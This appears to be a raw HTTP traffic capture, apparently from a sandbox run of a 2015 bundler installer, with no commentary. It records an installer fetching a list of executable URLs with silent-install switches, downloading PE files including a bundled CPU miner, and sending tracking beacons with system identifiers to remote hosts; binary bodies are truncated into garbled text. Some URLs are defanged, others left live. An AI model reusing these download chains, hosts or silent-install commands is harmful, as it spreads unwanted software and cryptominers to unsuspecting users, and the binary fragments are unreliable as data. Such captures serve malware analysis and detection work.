ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: E0nJoZPzH6UQYOUrE1T7xC 85vHAIA2MC4HqsApLsOf7TfxMc6bkxLS46 kWLGDb Au1UA iIA0=..x-amz-request-id: 6CFBDB0B49423DAB..Date: Wed, 02 Sep 2015 06:39:38 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET hXXp://installer.afsbdfgds.net/installer.php?id=800&env=2&setup_version=42.4&srcid=&dbb=ZHNwdHRjc3B4dGY=&pub_id=362&os=5.1&dotnet=4 HTTP/1.1

Accept-Language: en

Host: installer.afsbdfgds.net

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 02 Sep 2015 06:41:31 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

1ffa2..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en"> .<head>..<meta charset="UTF-8">..<link rel="stylesheet" type="text/css" href="css/global.css">..<link href="css/jquery-ui.css" rel="stylesheet" type="text/css"/>..<script type="text/javascript" language="javascript">./*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/.(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[ -]?(?:\d*\.|)\d (?:[eE][ -]?\d |)/.source,T=/\S /g,C=/^[\s\uFEFF\xA0] |[\s\uFEFF\xA0] $/g,N=/^(?:\s*(<[\w\W] >)[^>]*|#([\w-]*))$/,k=/^<(\w )\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[) /g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d \.|)\d (?:[eE][ -]?\d |)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q),e.detachEvent("onload",q))};x.fn=x.prototype={jquery:f,constructor:x

<<< skipped >>>

GET hXXp://bi.afsbdfgds.net/?pageNumber=0&event=document_ready&description=window_of_setup_loaded&pub_id=362&setup_id=800 HTTP/1.1

Host: bi.afsbdfgds.net

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 02 Sep 2015 06:41:32 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

0......

GET hXXp://bi.afsbdfgds.net/?pageNumber=1&event=window_close&description=user_clicked_close_button&pub_id=362&setup_id=800 HTTP/1.1

Host: bi.afsbdfgds.net

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 02 Sep 2015 06:41:32 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

0......

GET /df4a6a3ed77e60d6758afca091ca0c1f.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d16hr9n7t75k58.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 83341

Connection: keep-alive

Date: Mon, 31 Aug 2015 11:33:25 GMT

Last-Modified: Mon, 31 Aug 2015 09:09:52 GMT

ETag: "e822fe92076c33fa1784749fa9328584"

Accept-Ranges: bytes

Server: AmazonS3

Age: 68695

X-Cache: Hit from cloudfront

Via: 1.1 7f0216233154388a0ffe191ece5a7b12.cloudfront.net (CloudFront)

X-Amz-Cf-Id: C8lxDprMxxIYnxRFafCnglCWjaDXDmHcxIZu_HsYWJarzg5I0yAoLw==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P&..............................................t.......@&..............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P#..............................rsrc........@&......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /CPUminer/Bundle_CPUminer.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.software-forus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:28 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1439472602"

Last-Modified: Thu, 13 Aug 2015 13:30:02 GMT

Cache-Control: max-age=54530

Content-Length: 100529

Content-Type: application/octet-stream

X-HW: 1441175969.dop008.am4.t,1441175968.cds046.am4.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................p...............................................s.......`..8............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc...8....`.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /os/rm/OfferScreen_460_v2.zip HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: secured.nmsgv.us

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:40:03 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1437733599"

Last-Modified: Fri, 24 Jul 2015 10:26:39 GMT

Cache-Control: max-age=25556

Content-Length: 7704

Content-Type: application/zip

X-HW: 1441176003.dop002.am4.t,1441176003.cds039.am4.c

PK........Q~.B...._...........inner.png.V.P.i..da.QP...h.......$.!$ G.`........4$...UP.Ee8,..%.(.............u5..."r8r8......).j_U.....wW.......V. ...~.4.f5.<yz..w...].b..f.X.@&.H ...s!.O...........#.H.0.-c3.$.,Bs.u..Q<b^.=...^,$..P.PLF.k....|2*...2..P..7E..R..y).<"....pW.4."H....8... .>..4..k....".%.~s.........h.#.K...3.t........b1 ..uq..$....._...&..HL...[....#...0..\..;.aI4.$...,...9j4...b.G.(.Z/0. )O"...a10..p.D...Z.A..`.N,.~I.&e..'.........-.1!..........I.D.OS......:..|....D.).'....E.X.G#.4_.|!.D.P..>T.......5..\])x...........aAgW"..s.r%.@..G.i>T".......A....X*..y..V....U,.*.82X...q......`i...PYx4....|X../..O!.0...H`..9.$.....q....?9.h...W.,\i:p~.{.o....H....f4>}...@.t..(...oB.......h3A.g.....o..i)L...1:m..s.I..e.['/.p..U~..n..X..qzYd{./...Z...^..>..\..>w....!.PY44...a?.;%x....%..........kU....y.B_a.( ....,T#*.M..2iLI..C.. .FX....c.%:.s....F.@..wN}.i.....lb..&.........uV_.m.J....S3U.N. ..Y>f6f.t.....F...d....tBf..z....t..E.......u....m_u...77.vI.jVEn.00.....Z<[2....OZj].....n.0.Q. ....H..8.L62.zJ.'...X..d.......>...T......(.X....i.|...>L*ub......l.o..qe.>f6........{'e....z..p.wM...'....d!.-J.fn.K8".WD...... .ld>Rrb..........K...gz.....5l......4}...e2Q~9,..!...2..K....}.W.._....eM...Et\...|S. .1#/..82rkH....n..O.\m.b.........g.t~E....gN...q.%...;'"..^4m.............w.e......38..V.L......^.u..j.e.......Cvi.......vq$k'.....S.N..op.9.WV<g.. wmS............b.z$.9.>.7.T.....u.>.....-.<ps......K.v. .<.H...F.F....w.9................G.%..u......w.{....LB..

<<< skipped >>>

GET /69/all/cp/row/setup.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: dl.staticclientstorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:12 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1440321301"

Last-Modified: Sun, 23 Aug 2015 09:15:01 GMT

Cache-Control: max-age=1644

Content-Length: 1965128

Content-Type: application/x-msdownload

X-HW: 1441175953.dop001.am4.t,1441175952.cds064.am4.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S..............>.........q.............e...............b.......K.......r.........X.............:.......v.......?.....Rich....................PE..L......U.....................~....................@..........................p......q_....@.......................................... ...A..............H....p..........8...........................h...@............................................text...T........................... ..`.rdata..z...........................@..@.data....0..........................@....rsrc....A... ...B..................@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......

<<< skipped >>>

GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: livestatscounter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Wed, 02 Sep 2015 06:39:10 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.23

355..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=imi-tot-cpm-opw-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..http://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe..hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=iml..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..HTTP/1.1 200 OK..Server: nginx/1.6.3..Date: Wed, 02 Sep 2015 06:39:10 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.23..355..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=imi-tot-cpm-opw-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..http://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe.. /ci 12216

<<< skipped >>>

GET /SysInfo/validator/timer.php HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: livestatscounter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Wed, 02 Sep 2015 06:39:11 GMT

Content-Type: application/octet-stream

Content-Length: 165898

Connection: keep-alive

X-Powered-By: PHP/5.5.23

Content-Transfer-Encoding: binary

Content-Disposition: attachment; filename=lHFcE.exe

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P...............................................t.......@...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P...............................rsrc........@.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /os/rm/OfferScreen_12_HD_v2.zip HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: secured.nmsgv.us

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:40:02 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1432644107"

Last-Modified: Tue, 26 May 2015 12:41:47 GMT

Cache-Control: max-age=25557

Content-Length: 10033

Content-Type: application/zip

X-HW: 1441176003.dop002.am4.t,1441176002.cds040.am4.c

PK........K..B................img12_1.jpg.T.T.i....%qI.E..p.YTH.M..GLQ3...R4..G..;....V.Y....Le.RZ...GN*5ifei.{e.._3s...........{...{.{..G....u........M./.......G.. @]..QA.`.H.X@.by".P.?.m...b%..,......H....l12....QPo..QH....t`...7v$.. d.%x..'D.;.P...5... ....H.w'OD.PP_..U./0...J.GSP._^ 71|.n|!..`.....x$...o.s.w\.$..8,....0x...D.......M..Af...v.........g.gg..F`....X..K `T..(.'..`x"......p!G ..y./~h.?VLA.....PP.........r...Eb&{...E...6....c..l....X@v..C.|.?...{.}".b.(./@..9 .9<.?N...`..<.8.....SP*...a....$".H..v$....TG....u.....=.........e.......n?.~.....B..l.z!...Z0...\........\\........3..T......:#..{6O5.B.P...:_.......4....h...C.5 ..-...@SCCs.6........jz.:.z.:.......&...&.?...B...%zzK.-._.......@_....`.>.......[.T.PS..@....T...5Aj..._.....`5...(...Q....... .PW.P.A..P...l.....T.0...=7?.......h.....{.m0H..X.p.Bb.%....:.u........EL..#..k.R......5..... S.9........?}&..:.ix.>;d.....$L..../..@...*&....>v......&C.=..^I....<dFZ.....dee{(..&..g(6...<Q.g:.. Z.4...:S.&..-.. 3_....m7H.....k.c.[...Q.E.y..w.V..V'..F0.%. .Y..(.7.N.hiW,....{Z~..S7....4.R6...8.A......b..s..i.d...-y...:O[0..#3U...^... 7M.9......|.}`..~.V4q:.t..ENH[:.z.^.W.4......QF..>A .S.......1}.......@.5..=....d.oh.}.`.....9..%..G.....v.........j.pw.....r.?....@&....y..}f..#..........v.O...u....'f.$..d..Z.>f....t..sA..O._.$[<w..v...N.8.$....a<.S...[{HWF085.L.."^.;NQMv.J.^...7...H.....WG>...6.........W7..I......4eiZ.L..e=.|....v..r(L......m.m..v.LY....T.7... .}q\......g%..M...$-.....C;S>n.....t;.e.b..|.7&.0.=.r..}fep...

<<< skipped >>>

GET /crossbrowse/ie/106/ie.zip.004 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:17 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1431408217"

Last-Modified: Tue, 12 May 2015 05:23:37 GMT

Cache-Control: max-age=6310

Content-Length: 8076624

Content-Type: text/plain; charset=UTF-8

X-HW: 1441175957.dop018.am4.t,1441175957.cds037.am4.c

./..:S.p}...E.%C...Z#.e(..4z..i8..7..=.U."G.}.(Z.q.kR...%..M....d.&.F..).'|mZ"K...@....&.._.[...jK..I8..g.-.V.U....#...K.M@..z).b.W,O.jUny\.ty...uU6......a%....O..~......W.)U.dG>TU.vw^..*..?..A.Zz.....C.....@...-...3.:)XqWM.3\..7.....H.*...Ja.F.....A....m..'......N...K._.b... .'M.fD..y....Z..}'!SS.l..r.l.&rf...$/....`X....<0.^.J..N .tJ)<^...]...|Zd`2=.$t.d...Tm..wI.W.U....:.va...Mz0/.:.....%M.....'O._...6....._....dW..b/....v....T'..}...b.aJ...P.N...j.{.."H.....D4.....-7...E.....[..R{bz..L*.m2]...J.."1. DT....._.t.A.4......Z....?..I.I........Q...."....m,eNO...h..8s..i,..8n....t/<.......j9.rK....>.px.........^".j^.c......<.*X7..b..g..."..Na..:3..sj.j.Pk....;\...e.......f......."...#...*|%zB.O...&.....5n7..6..v..2.k<N*>N...9..L..F........T ....\..jS...%R..m:Fke.d.....d.......g.s...H......t....O3....u]..Q!.r....D.*@......$*.5\7.4i|...1.....s....k.a.Y..@.....U..........(...6...7{.i.|[.Do!..)..?...W\.m...*.~....r.... E3<..%0)Au...f..T.*.<n....bK tf.'P............e......d... .V...}.a.QE.pn-x.B......R....h.Q.W,.$......H,...*...XP..D...:\.ngJ..0~3.. j.....,.m.....H........b{..G.m......>.:.....?.....y......]......8h.N.....@.>..M^.p..c6.&.?x.T.oI.=......{ua..)....9V...2.2..<P.t<.I....'~..3.n]......u....tn...q....h. ...Kg.._...#...:.....-=...m.7..T...v........Kh.ti.n.oc.xP..1=(........47...............X.Vo:.K....?.V....z ...0Z.e].6F...Q.#.7r7....j....Tb..o..k8t.Z#....GXiZ.._...(.....-.(..Y.ew..[4... ... ..d..l..).m.FQ.MU..=.@....*.........P.'...(C......{.....u.W..$..3A..... ...&lt

<<< skipped >>>

GET /crossbrowse/ie/106/ie.zip.005 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:16 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1431408217"

Last-Modified: Tue, 12 May 2015 05:23:37 GMT

Cache-Control: max-age=6311

Content-Length: 8076624

Content-Type: text/plain; charset=UTF-8

X-HW: 1441175957.dop018.am4.t,1441175956.cds060.am4.c

.p.w..n..{j..Z.\r/%..#k(. .~.N*.....uo...,.....].ys.....=.VS..u..'..a...>...0>.`X.E ..Lm.#SY....t.AZ..S&..L..?...4..k.scM}.|j.f.V.%Tw...........S...m%......(.^l@..n)....1....g.!.|......2V]N.. .Yj..k~:.mAb..5u.E......p..._.K ..h...9..pil......7f%.......T...../.....yh....R..xi..".T....YyQ^V..T..l.?.S]....R.....j.!....H.q.V.j..X....K..l7..s.SV.,.D........:.......-...`\O.......E_..j.&......6.o....)M...6......i,7......a.).F...k9....J !.....K.q6.O.6.#}c..-.zo6..".....TtoK...e.w..7$[&).cJ/......h..'2:....,...>....5.....l...~.........Pjd..OJ[....$i}.bw..*[~.`...".P......`...Uv/v...E..'.0=&.#.5H*y.V>..>....m.#...P..P:.$.OO.....l"..V...lLX.R>y.*..f..'.5......F>a.h..W)...B.l...s..J........n.}.....o.1.M...V..Y.:.@.Z.^"...*$..^.[.m..?...). .H=$...ne...wQ.p.........ZKX.[.[ek.....I~.E..-.......Z.V.]3.........J..H...p..:..X];.a......~.d.....,......K...p..t...o....i..H0.9..u#...c....T7V.S...*..-.IZ......i\...!..2~rU..e.JP..._.nQ...v~....o....U........f$.-.kJ....$'....U:..g.....l#...i......{r.....[..oe7`..l....1n.R.....e.B}][w.HR2.3v.O.cw...N...............k..=..LN=H2...Fjs...LdG....T:.2"..c.e..U..r].>#..g%...f.gg.....A0.,.........KC..?^.|.h..i.f.1.......E.5 .G....f.*...OZ.`.~Z.f......&u...w.6o.e ..*xQ.I......2Ui..P7...'..C....0..vV.V3.;.gw...e[....#..1C.u......'...%...\.....|.c.VD..7..3 6u%sJ.....e....9.@r..x}.. EP.i.by.mF.;......GP..ia....;6.....CJdu...[V|Ll..8....x.h/.F}%0.....'.P....]..gg.....6....U....?....R'/.fv.hF........tk....y D.cD....%. .P^...Px._..,..w.-DL!05.}/h.6zk.l....r..y......;Y...D.o.R..

<<< skipped >>>

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:35 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Wed, 02 Sep 15 06:39:00 GMT

Set-Cookie: _c4aid=34887D5223304C22AF037B2539E4DD35; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=34887D5223304C22AF037B2539E4DD35,1441175975.68785; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..

GET /SysInfo/Validate.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: download-servers.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 02 Sep 2015 06:39:09 GMT

Content-Type: application/octet-stream

Content-Length: 61981

Last-Modified: Fri, 15 May 2015 18:22:11 GMT

Connection: keep-alive

ETag: "55563953-f21d"

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

POST /thankyou.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.downloadsoup.com

Content-Length: 459

Connection: Keep-Alive

Cache-Control: no-cache

cnt=d8ed7e7dc6a19345be5b5f7a131ee532&_srvlog=NSI &browser=ie&capp=nsdummy&cid=12216&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=6FE5DDD064E91F40D31A83BB9FE8886E&sysid1=6FE5DDD064E91F40D31A83BB9FE8886E&te=1441175975&ts=1441175974&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsm25.tmp /ci 12216&bti1=

HTTP/1.1 200 OK

Content-Type: text/plain; charset=UTF-8

Date: Wed, 02 Sep 2015 06:39:31 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 14

Connection: keep-alive

.... ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Wed, 02 Sep 2015 06:39:31 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...... ....

GET /data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=4&rnd=6761 HTTP/1.1

Accept: */*

Host: logs.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:37 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1441175978.dop005.am4.t,1441175977.cds063.am4.c

GIF89a.............,...........D..;..

GET /data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=3&rnd=3075 HTTP/1.1

Accept: */*

Host: logs.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:15 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1441175955.dop005.am4.t,1441175955.cds063.am4.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Wed, 02 Sep 2015 06:39:15 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1441175955.dop005.am4.t,1441175955.cds063.am4.c..GIF89a.............,...........D..;..

GET / HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:14 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Wed, 02 Sep 2015 06:39:14 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /crossbrowse/ie/106/ie.zip.001 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

